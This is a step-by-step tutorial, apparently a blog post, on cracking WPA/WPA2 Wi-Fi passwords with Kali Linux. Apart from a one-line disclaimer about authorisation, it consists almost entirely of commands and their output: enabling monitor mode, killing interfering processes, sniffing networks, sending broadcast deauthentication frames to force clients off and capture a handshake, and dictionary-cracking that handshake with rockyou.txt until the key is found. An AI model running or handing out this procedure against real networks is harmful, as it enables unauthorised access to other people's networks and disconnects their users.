Hacking WPA /WPA2 using Kali Linux
Disclaimer: Do not try this on networks you are not authorized to do so on.
— List the wireless network adapters
root@test1:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb D-Link Corp. DWA-125 Wireless N 150 Adapter(rev.A3) [Ralink RT5370]
root@test1:~#
— Start wireless monitor across that adapter
root@test1:~# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1072 NetworkManager
1185 avahi-daemon
1263 avahi-daemon
1328 dhclient
1970 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb D-Link Corp. DWA-125 Wireless N 150 Adapter(rev.A3) [Ralink RT5370]
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
root@test1:~#
— Kill the Processes IDs that might interfere based on the list above
root@test1:~# kill -9 1072
root@test1:~# kill -9 1185
root@test1:~# kill -9 1263
-bash: kill: (1263) – No such process
The failure of this process to die is okay, it is probably a spawned process from the first so the first kills the second.
root@test1:~# kill -9 1328
root@test1:~# kill -9 1970
root@test1:~#
— Run dump to view wireless networks;
root@test1:~# airodump-ng wlan0mon
CH 12 ][ Elapsed: 54 s ][ 2016-12-19 07:33
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:86:74:78:68:A3 -44 13 1 0 11 54e. WPA2 CCMP PSK testnetwork
E4:83:59:22:9F:1E -82 14 17 0 11 54e. WPA2 CCMP PSK testnetwork
BSSID STATION PWR Rate Lost Frames Probe
64:86:74:78:68:A3 34:E6:AD:40:B2:0D -76 0 – 0e 0 1
E4:83:59:22:9F:1E 08:11:96:E2:28:02 -40 0e- 0e 0 13
E4:83:59:22:9F:1E 76:70:02:78:68:A3 -44 0e- 0e 0 6
root@test1:~#
use Ctrl + Z to terminate after sometime
— dump traffic from the wireless network of you choosing, where -c = Channel name of the network you want to access, -w is the filedump of it’s traffic, -bssid is the wireless basestation id
root@test1:~# airodump-ng -c 13 -w dump.pcap –bssid 64:86:74:78:68:A3 wlan0mon
— At this point what we would like to do is get the wireless handshake and to do that we use the aireplay-ng tool with the BSSID of the Access point to access;
root@test1:~# aireplay-ng -0 0 -a E4:83:59:22:9F:1E wlan0mon
07:56:35 Waiting for beacon frame (BSSID: E4:83:59:22:9F:1E) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client’s mac>).
07:56:36 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:36 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:37 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:37 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:38 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:38 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:39 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:39 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:41 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:41 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:42 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:42 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:43 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:43 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:44 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
07:56:44 Sending DeAuth to broadcast — BSSID: [E4:83:59:22:9F:1E]
^C
root@test1:~#
— when you see a handshake in the airmon you can stop the replay.
root@test1:~# airodump-ng -c 11 -w dump.pcap –bssid E4:83:59:22:9F:1E wlan0mon
CH 11 ][ Elapsed: 7 mins ][ 2016-12-19 07:56 ][ WPA handshake: E4:83:59:22:9F:1E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:83:59:22:9F:1E -80 100 4169 4877 48 11 54e. WPA2 CCMP PSK testnetwork
BSSID STATION PWR Rate Lost Frames Probe
E4:83:59:22:9F:1E 08:11:96:E2:28:02 -28 1e- 6e 0 2609
E4:83:59:22:9F:1E 76:70:02:78:68:A3 -40 0e- 0e 8 2148
E4:83:59:22:9F:1E F0:25:B7:72:21:35 -82 1e- 1 0 115
root@test1:~#
— Next we use aircrack against the pcap file with handshake, my file has -03 appended to show it was the third file in the dump, as the dump runs for a longer time it keeps breaking the files into smaller chunks
root@test1:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt dump.pcap-03.cap
Opening dump.pcap-03.cap
Read 27727 packets.
# BSSID ESSID Encryption
1 E4:83:59:22:9F:1E testnetwork WPA (1 handshake)
Choosing first network as target.
Opening dump.pcap-03.cap
Reading packets, please wait…
Aircrack-ng 1.2 rc3
[00:00:02] 1044 keys tested (374.09 k/s)
Current passphrase: 321654987
Master Key : 71 AD C8 A3 CD FA 1A 2D 3D F3 BF 1F FE 9E E2 59
D8 D8 D2 78 AA A7 08 93 7E 65 3C B7 C4 6F 4A E2
Transient Key : 20 C8 B1 23 CD 57 83 50 2E 4F 13 25 9B DE 76 4F
4D EC F5 E7 47 C9 CB F8 4E 9F AD 5F B1 06 9F F1
9E 86 36 49 ED D7 D5 D1 B1 25 7A 30 3D FF 54 AD
D5 8C C5 03 3A B9 7E F9 9A 4A 60 B5 04 E2 11 8C
EAPOL HMAC : EF 31 CC E5 09 64 4A 8E F2 0E FB 70 3D 30 33 6B
^C
Quitting aircrack-ng…
root@test1:~#
— When the key is found the message becomes;
root@test1:~#
root@test1:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt dump.pcap-03.cap
Opening dump.pcap-03.cap
Read 27727 packets.
# BSSID ESSID Encryption
1 E4:83:59:22:9F:1E testnetwork WPA (1 handshake)
Choosing first network as target.
Opening dump.pcap-03.cap
Reading packets, please wait…
Aircrack-ng 1.2 rc3
[01:16:41] 1970412 keys tested (478.44 k/s)
KEY FOUND! [ zzwwwzzyyyy123 ]
Master Key : 3A 4D 8B 26 44 04 3A 2B B8 C7 B9 6F 76 81 4F 82
22 03 2A B3 8A 19 1E DF 02 F6 65 7F 62 A1 35 D8
Transient Key : 02 33 6E 00 39 0A 60 F8 FF 69 9D 23 FE B9 E5 29
C2 49 AC 3F 30 C1 E5 28 AE C6 BA 70 CF 82 81 80
57 13 6A B2 40 AC 20 D4 AE AC DE 15 05 88 0B 7F
30 3E 8B 7F CB A2 1A 3D 6E 3E D5 F2 86 1B EC 01
EAPOL HMAC : 0B E6 45 54 80 02 D7 06 DE 60 75 52 B0 D6 53 9A
root@test1:~#